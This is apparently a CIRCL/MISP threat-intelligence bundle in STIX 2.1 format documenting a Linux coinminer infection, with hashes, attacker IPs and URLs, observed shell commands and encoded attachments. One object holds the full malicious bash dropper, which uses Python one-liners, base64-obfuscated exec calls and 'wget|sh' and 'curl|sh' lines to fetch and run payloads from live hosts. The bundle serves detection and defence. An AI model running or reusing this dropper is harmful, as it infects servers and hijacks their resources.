{
"type" : "bundle" ,
"id" : "bundle--5cf22f74-759c-4744-90eb-4300950d210f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:26:08.000Z" ,
"modified" : "2019-06-01T09:26:08.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5cf22f74-759c-4744-90eb-4300950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:26:08.000Z" ,
"modified" : "2019-06-01T09:26:08.000Z" ,
"name" : "Linux server infection with coinminers (derived from original post with iptables rules)" ,
"published" : "2019-06-01T09:26:35Z" ,
"object_refs" : [
"indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f" ,
"indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f" ,
"indicator--5cf23658-5858-45ec-bd98-437b950d210f" ,
"observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"indicator--5cf22fbc-cecc-465b-a261-4385950d210f" ,
"indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734" ,
"x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f" ,
"indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7" ,
"x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f" ,
"malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"indicator--5cf23717-673c-48de-9834-476d950d210f" ,
"indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f" ,
"malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"indicator--5cf238a2-0e5c-447e-a584-4072950d210f" ,
"indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f" ,
"indicator--5cf23a31-1db8-4b41-81af-4416950d210f" ,
"indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"indicator--5cf23fe9-25c8-47df-a38a-4325950d210f" ,
"indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"indicator--5cf240b4-352c-40a3-8aba-40b5950d210f" ,
"x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f" ,
"relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c" ,
"relationship--60ac44d9-d531-45b1-8a21-5f140e87475b" ,
"relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d" ,
"relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368" ,
"relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8" ,
"relationship--40b561d5-1976-4f05-9e7a-499673ffd659" ,
"relationship--738f0138-0374-45b7-8664-00085370a299" ,
"relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa" ,
"relationship--5e50743c-8193-4cbb-a7e5-84019278877f" ,
"relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f" ,
"relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd" ,
"relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247" ,
"relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57" ,
"relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\"" ,
"misp-galaxy:malpedia=\"Coinminer\"" ,
"misp-galaxy:tool=\"CoinMiner\"" ,
"misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"" ,
"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:56:00.000Z" ,
"modified" : "2019-06-01T07:56:00.000Z" ,
"description" : "Coinminer" ,
"pattern" : "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T07:56:00Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"md5\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:20:48.000Z" ,
"modified" : "2019-06-01T08:20:48.000Z" ,
"description" : "Coinminer" ,
"pattern" : "[file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:20:48Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23658-5858-45ec-bd98-437b950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:24:56.000Z" ,
"modified" : "2019-06-01T08:24:56.000Z" ,
"pattern" : "[url:value = 'http://165.227.140.184/tmp/nww']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:24:56Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:15:07.000Z" ,
"modified" : "2019-06-01T09:15:07.000Z" ,
"first_observed" : "2019-06-01T09:15:07Z" ,
"last_observed" : "2019-06-01T09:15:07Z" ,
"number_observed" : 1 ,
"object_refs" : [
"file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
] ,
"labels" : [
"misp:type=\"attachment\"" ,
"misp:category=\"Payload delivery\""
]
} ,
{
"type" : "file" ,
"spec_version" : "2.1" ,
"id" : "file--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"name" : "liu.png" ,
"content_ref" : "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
} ,
{
"type" : "artifact" ,
"spec_version" : "2.1" ,
"id" : "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f" ,
"payload_bin" : " i V B O R w 0 K G g o A A A A N S U h E U g A A A y 0 A A A O j C A Y A A A C 2 q u u u A A A A B H N C S V Q I C A g I f A h k i A A A A B l 0 R V h 0 U 29 m d H d h c m U A Z 25 v b W U t c 2 N y Z W V u c 2 h v d O 8 D v z 4 A A C A A S U R B V H i c 7 N 13 n N 1 X f e f / 1 z n f d r + 3 T 5E0 I 2 k k W 90 q 7 i H 0 j u k l B I g p + 8 u C M R B K 2 k J + 2 Q R + Z R O W T T a / 8 C O E X V o S N i R A I K F j b G y w j e M m X G T 1 X q b 3 u f 1 + 6 z n 7 x 5 X H k q t s y 5 q x f Z 6 P h x 56 z J 0 7554589 X o + 77 n n M 8 R W m u N Y R i G Y R i G Y R j G I i U X u g O G Y R i G Y R i G Y R i P x o Q W w z A M w z A M w z A W N R N a D M M w D M M w D M N Y 1 E x o M Q z D M A z D M A x j U T O h x T A M w z A M w z C M R c 2 E F s M w D M M w D M M w F j U T W g z D M A z D M A z D W N R M a D E M w z A M w z A M Y 1 E z o c U w D M M w D M M w j E X N h B b D M A z D M A z D M B Y 1E1 o M w z A M w z A M w 1 j U T G g x D M M w D M M w D G N R M 6 H F M A z D M A z D M I x F z Y Q W w z A M w z A M w z A W N R N a D M M w D M M w D M N Y 1 E x o M Q z D M A z D M A x j U T O h x T A M w z A M w z C M R c 2 E F s M w D M M w D M M w F j U T W g z D M A z D M A z D W N R M a D E M w z A M w z A M Y 1 E z o c U w D M M w D M M w j E X N h B b D M A z D M A z D M B Y 1E1 o M w z A M w z A M w 1 j U 7 I X u w L l w Z G i c s e k K Y 9 M V x q e n k L Z N x v Z I o g Q L i e N I g i Q g U i l L e r t Y 1 t v F i p 5 u N g z 0 L 3 T X D c M w D M M w D O N Z T 2 i t 9 U J 34 m y r 1 h v c s 3 s / + 48 N c X h o n F R Y p F q Q x g l a B y z r L r G 0 u x v f d n E s G 6 U V s 40 a x 8 f G i K U g Q Z I q h S s c 1 q 7 o Y + P A C i 7 f s o 6 + 3 u 6 F / t Y M w z A M w z A M 41 n n G R N a 6 o 0 6 x 4 a G O D Y 0 z M j E F C e G R g g S R a o l i d I k G l Q S I + I m 3 c U c P a U i G c t G K E 2 c J M z U q 0 x W K p 3 Q o i C K E 9 I 4 J Q 1 T 0 j i m 1 W q x o n 8 p r 3 r R C 3 j F i 1 / I y u V m F s Y w D M M w D M M w z o W n f W i Z r c 
x x 14672 b 1 / L 0 m q U A q E t J i r 1 o l T j Z Y O U Z K i t Q B S H B 3 i W R r f 9 X C E w L U s b M c h T B O 0 b Z N K S R A n z F U q T E 9 M M z 4 y z t z M L G i Y q 1 R I 4 w T X d X j 7 b 76 F D 7 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
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:56:44.000Z" ,
"modified" : "2019-06-01T07:56:44.000Z" ,
"pattern" : "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '165.227.140.184') AND network-traffic:dst_port = '80']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T07:56:44Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"ip-port\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:19:23.000Z" ,
"modified" : "2019-06-01T08:19:23.000Z" ,
"pattern" : "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6' AND file:hashes.SHA1 = '535fd49cf76e48d610f2e80d0ce16d722ba6b949' AND file:hashes.SHA256 = '7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:19:23Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T07:57:37.000Z" ,
"modified" : "2019-06-01T07:57:37.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-02-25T10:14:54" ,
"category" : "Other" ,
"comment" : "Coinminer" ,
"uuid" : "ab588995-f90a-4487-8efd-ec53c6e3fdfd"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805/analysis/1551089694/" ,
"category" : "External analysis" ,
"comment" : "Coinminer" ,
"uuid" : "dc266a97-294a-48dd-9ea8-4e2d3ec4f8e4"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "6/53" ,
"category" : "Artifacts dropped" ,
"comment" : "Coinminer" ,
"uuid" : "c278894e-a2a2-40aa-8ae3-ec6d45acc2e9"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:18:46.000Z" ,
"modified" : "2019-06-01T08:18:46.000Z" ,
"labels" : [
"misp:name=\"shell-commands\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "language" ,
"value" : "Bash" ,
"category" : "Other" ,
"uuid" : "5cf234e6-4da8-49b5-b064-4e40950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Malicious" ,
"category" : "Other" ,
"uuid" : "5cf234e6-ee88-4671-90c3-4ee5950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed" ,
"category" : "Other" ,
"uuid" : "5cf234e6-c614-47da-a863-46e8950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "sh -c /var/tmp/sde ryuf" ,
"category" : "Other" ,
"uuid" : "5cf234e6-9c48-4372-bab4-42b0950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "sh -c /tmp/sde ryuf" ,
"category" : "Other" ,
"uuid" : "5cf234e6-abec-4654-a935-4354950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "shell-commands"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:24:11.000Z" ,
"modified" : "2019-06-01T08:24:11.000Z" ,
"pattern" : "[file:hashes.MD5 = '3694010708de4a2c916e34cbe2a0ed60' AND file:hashes.SHA1 = '6faf93653c6f64d7aa814c878fed112a6db992f6' AND file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:24:11Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:20:59.000Z" ,
"modified" : "2019-06-01T08:20:59.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2019-02-10T19:49:48" ,
"category" : "Other" ,
"comment" : "Coinminer" ,
"uuid" : "266fe354-b65d-425a-9c9e-3544e0c5a9f1"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/file/0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72/analysis/1549828188/" ,
"category" : "External analysis" ,
"comment" : "Coinminer" ,
"uuid" : "e4df3142-d2dd-48ed-81d8-dada676b54e3"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "1/58" ,
"category" : "Artifacts dropped" ,
"comment" : "Coinminer" ,
"uuid" : "a64f16e1-a212-4a8f-ba03-dbc5fed0c2bd"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:23:21.000Z" ,
"modified" : "2019-06-01T08:23:21.000Z" ,
"labels" : [
"misp:name=\"shell-commands\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "language" ,
"value" : "Bash" ,
"category" : "Other" ,
"uuid" : "5cf235f9-bef4-4265-ad47-48c2950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Malicious" ,
"category" : "Other" ,
"uuid" : "5cf235f9-9bfc-4e50-9433-44d2950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "atd" ,
"category" : "Other" ,
"uuid" : "5cf235f9-a640-4b3b-8627-4592950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "shell-command" ,
"value" : "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed" ,
"category" : "Other" ,
"uuid" : "5cf235f9-91cc-411f-8124-4241950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "shell-commands"
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cf236e8-c18c-45ff-852e-4be0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:42:17.000Z" ,
"modified" : "2019-06-01T08:42:17.000Z" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"Bash"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "#!/bin/sh\r\nif ! ps -ax | grep -v grep | grep \"[ ]\"$ >/dev/null; then\r\n\t nohup python -c 'import os,urllib; proxies = {\"http\": \"http://41.203.146.142:8080\"};f=open(\"/tmp/hsos\",\"wb\");f.write(urllib.urlopen(\"http://165.227.140.184/tmp/ofd\",proxies=proxies\r\n).read());f.close();os.system(\"chmod +x /tmp/hsos\");os.system(\"chmod 777 /tmp/hsos\");os.system(\"/tmp/hsos\")' &\r\n\t sleep 3\r\n\t nohup python3 -c 'import urllib.request; urllib.request.urlretrieve(\"http://165.227.140.184/tmp/ofd\", \"/tmp/vov\");os.system(\"chmod 7777 /tmp/vov\");os.system(\"chmod +x /tmp/vov\");os\r\n.system(\"/tmp/vov\")' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTsgbD1iaW5hc2NpaS5iMmFfaGV4KG9zLnVyYW5kb20oNCkpOyBoZD11cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vODcuMjM2LjIxMi4yMzcvdG1wL29mZCIsI\r\nCIvdG1wLyIrbCk7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC90bXAvIitsKTtvcy5zeXN0ZW0oImNobW9kICt4IC90bXAvIitsKTsgb3Muc3lzdGVtKCIvdG1wLyIrbCk=\".decode(\"base64\"))' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTtsPWJpbmFzY2lpLmIyYV9oZXgob3MudXJhbmRvbSg0KSk7aD1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vIitsKTtwcm94aWVzPXsiaHR0cCI6Imh0dHA6Ly8yMTEuM\r\njQuMTAzLjIyODo4MCJ9O2Y9b3BlbihoLCJ3YiIpO2Yud3JpdGUodXJsbGliLnVybG9wZW4oImh0dHA6Ly84Ny4yMzYuMjEyLjIzNy90bXAvb2ZkIixwcm94aWVzPXByb3hpZXMpLnJlYWQoKSk7Zi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB\r\n7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9ICYiLmZvcm1hdChoKSk=\".decode(\"base64\"))' 2>&1\r\n\t wget -O - http://185.165.169.6/jp/_j.sh|sh ; curl http://185.165.169.6/jp/_j.jpg|sh\r\nfi" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23717-673c-48de-9834-476d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:28:07.000Z" ,
"modified" : "2019-06-01T08:28:07.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 9 f 189 f 26 d a 1206151 c e 39e5 a a b 269 f f 6 ' A N D f i l e : h a s h e s . S H A 1 = ' 4 e e 5040 a f 71 f 5 f d 8080 f 0 f 0 b e d 2672 b c 1 f 68 d 1e1 ' A N D f i l e : h a s h e s . S H A 256 = ' 1 f c 77 c e b 1 f f a d 48 a 0 67 c 9 c 83 b c 1 c 5347e4 b 359 b 4520859 b 91 f c 14 f e d c 29 a 8803 ' A N D f i l e : n a m e = ' o f d ' A N D f i l e : s i z e = ' 56392 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A I R D w U 4 m B t S U L 9 k A A E j c A A A g A B w A O W Y x O D l m M j Z k Y T E y M D Y x N T F j Z T M 5 Z T V h Y W I y N j l m Z j Z V V A k A A x c 38 l w X N / J c d X g L A A E E I Q A A A A Q h A A A A 7 Q c f j E b W 4 M / H U p T D E U o f 9 y + C k I h e 1 h u H m u V y V A 1 o e W / 2 M H g U B t H e 6 B q O 1 n N T 0 a t U Z 9 C H F L Q J V X 1 h n B i a s A e h K 5 + I C 2 G b 9 l m B u H E G x e g z g L + p x f r W B F h D 2 t m n x z / R z o 8 + z w Z S M Y J 0 a D c l v C K S P 6 V 9 w 3 e x h + N 0 v M 6 E h e s X A 4 r 4 h G V n 8 Q C h w c M D 3 v j b 3 r m b s M p 2 I o N f W F h J H 4 m i 5 F N x B E p e S z A g J K G R 36 D 0 3 I T y V z P 4 P s e L 5 + v 7 F T X t Q 57 L J G O b B F R c i 81 r w q z U W s o K e V j O c 0 X s i C j V F p A V 5 T W T O T Z Q C n Y f x x q Q R p X x z s D / 4 h / a A f Y 1 p f 1 r d r 4 s 3 w d X l 9 g R q g f o 9 X a N J f b / J 12 G F q q v x h 8 m t t p / p f p p W z O Q k I Y J S B 4 B p c v 4 V 6 W y X 0 i f F I v 2 Z H 2 e J Y W 7 e s a 9 C J K L x m X W V H 4 y a u 4 I Q g J F 7 a 8 J O r a Q 92 B / 1 v L N T Z 6 M B R 3 l R + T 3 k f + U / f Z q p w W P G 3 g s B k M / J f 2 p O n t Q a y G t Y h x g i e w j Z U 1 V t 8 V E 51 V f C T e a a 2 X 9 x 8 T a p 1 B y D d H x S s S d B n U a L Z P j w O 38 y 8 Y 6 G 2 U i F 7 Q d M 0 Y 6 m M 20 F j J X c N 9 h a g u R A 7 q h 9 O o 2 L d E m f 0 y V A l M F Y b 3 t K 60 Q B O r c D n M e a 2 o T S q 1 c Y + V 4 F v t K A t N 238 B R e o 
b I t W d W j 7 D 8 K s h n 8 + 2 q f v q o A 9e5 X y M f J u R q I Z Y X K + p l Y D + v s m X k T b + 2 n e s r J E w Z r i y 6 K f O T k w G Q p e n a f n o V + z P a W V N k c 0 o D W v w y q A L A l M 9 b l x a M y Z i F k O f R G j Y M y u 1 J F L l e R e D e X e l P z j R o J 8 W C 9 p s o D 7 x Z U 214 s 8 R M g n J c 5 p W b E P W 8 z 6 H g y V I u F 0 v l Y v Y u A q l 3 Y d m F l F S + D I a f w Y t 77 i B z O S N Y + D C 8 F / u S I A C e n A w v f Q w J m Z 1 G U v z N + w m o x d 8 p j Q c Z r f 0 d t 15 H Z b / k M 6 M e w K / 5 M B M H L V N g i Y y / 95 C j z K O b 2 b U / o X c c v h E I K D X 20 H t 0 u y 5 q h O l s E G c 5 O u c b / z Q 3 Z P O Q w 3 g R d 2 f g G L r 4 w C G R 1 X 4 E e U N k 895 s Z 8 T B s E K v b P / E h O j l o f d 8 k v o Q i V a x D R z P n G U V r 6 L 3 S r Y h W 8 C 2 s m r a C q c p i n e 1 Q E Q K 4 z S h Z B e M j h p R M T r M U B / h m T 8 t O H c 3 o U K M w i b A m e d e V H o P r k Z F o 8 z P A L A b b 3 q x Q 5 T x 4 B c O Z X 4 b w 0 x l t L o N p T R j S K y F H 9 H 8 j 3 b n G u 6 i L J Z 4 e i J 0 8 C s / j b w N 0 b w W / U u W U Y T 7 G I h p f w i 2 V q o j a w I X E 0 9 E p 3 v L P G C K U h + J 6 U T h 4 G h w l E s A X r r q 7 z h l l f y g z 3 + N P 2 H g 2 L Z 0 1 J G X 1 N g A Z Q c S r E L j c q K C t Z 5 j + H S g k d Q u g P T Z e l r V B I J N v j 8 s / Q H 9 s M z 1 E i 3 v j y V r J m H l 3 A A G r 7 v 728 Y c 7 d 3 w S M x 7 A W W b 4 e y E Q / D i A i t 2 Q 1 l P J V D a G N n X m F 31 b o t 7 H H G S U r X Z y W p 3 K 18 p b q 97 R o 2 m W q n W 1 g k 3 k 7 G q / V u Z Q C v u c V b w H C V k 7 u e l 5 d w p Q Z g V i 1 z d d Y u H o s h h t o c h E J I g v C n U / c 5 m e m L v Y U i q 6 V W e r S 4 i U t F d i O i 0 I U 4 U d V J a h s 1 z J B w P K h C N h w u f 46 U u v A K s 0 E u X R u 6 z 8 W Y d p l J g g n i f y J a 7 / K 4 + G 9 e e s B B 4 R P D H J h A 8 h g Z j f 2 r g A L W n m 8 n E 8 u X g N n G W A F x f t D V o z q C s L x n O 8 j 3 R 0 v 0 N T z 2 m C W 8 t d 0 N A M / 
u 3 O g n t f t K I 4 y Z 6 o s I e K E / F 8 L R 4 C A 2 k V q k X K M B f i 8 N t l 9 a + k y 3 Y N d 6 B C F E O C s 72 / Z o j D l N P k x 4 b x i j o o c Y W P s M K l Q 6 i i h n 0 V c D + C L N w z 7 S 8 j Z M D D C 1 b 5 L q f k 5 V P 7 y o W F 3 U M + f R / u N w H p t Q p L 6 R y L Z 3 / B + j 5 E r E p d a d X U U 3 v n u h 8 K 716 N u u E G 2 C I X p w r q 4 T S l m R v + 4 R M i H l m / t c A a t D 46 Z V 1 h p L H 8 j n 0 z l I 89 r V k X 1 M g i Z d F 7 l + 3 C A s U L 77 b t d 5 m k U h D S n Y 8 X D t 5 J q r z B c S L t Y a F I 3 d b G 6 I n m 5 V g K 4 z k g 2 Z A G s B H C 34 D I q L B m 6 Z n V X w 0 X + o Q 15 l g W E D v J w Z R R T B 2 D n o V o i x U m b I K W N z f C d b F / H c 6 M n w b z k h / f D u 944 K l I l 1 B z Z u S h Q y N k 9 Q 9 z x c X C 2 x d 8 x h E g T O Q d 3 d n 7 d p q 0 x H 0 S / L Z 6 X A Z t c Z O W 9 l k u S S s g f D o I x 64 p y F D a F d + o O 1 Q r I Y d 10 M K A m 6 N L M Z T z B P n l c / G b J C 1 Q C F R Y c 59 S i O h S 4 s 0 7 Z 1 P 30 o 0 q j h / i v Y i R Q V R G R d o 8 X E v f i F F T c X C Q T C r 0 O d O E 0 q / B 16 N J d h z N B + z L n H 3 s P 1 W y D O E c Y / F h v p 2 S 4 k p r Q n n L I k 3 / C Q c F v a m z e a y z 1 t + 7 l h C Q + B j f x a p u k c 5 l U r U 36 Q Q S B u D c L 40 p Q p 5 u 4 c d k T h 3 y K / y c N g d J y K 3 n X T q 0 g y c F 2 y b H e D 7 k O N C N / 2 t I S J f P 4 + h E P m x e T j z w 4 L a C 3 k A l e x H p P I R Q Z T d C h b 1 w F p q 2 T R O 8 B r T L 8 X l k F f d / K N t m 87 V X + g / U n R V F Q 4 a D K + Y 0 J a Z u a 2 y I O g k v e H O j P T s f Z D R H o K t L E Z q Y H k L + a o c g A Y S i e N u Z 19 L E 8 G 0 w k n a R S f n q b W M c G 7 I 1 a w y Q Q Z B 942 V P F T n 8 C u M A N X i Y s h 3 N s k 3 r K 6 H B g a z t C P m I K e Q X u t h U E 0 i F / e C E t D q v C b b 4 j k T 4 i 0 T I u H Q 7 V P K t E Z / t 5 j N + j P s L 0 P b V a Y X b l o p 5 P f O B d o G / 0 k v T L 0 n Z 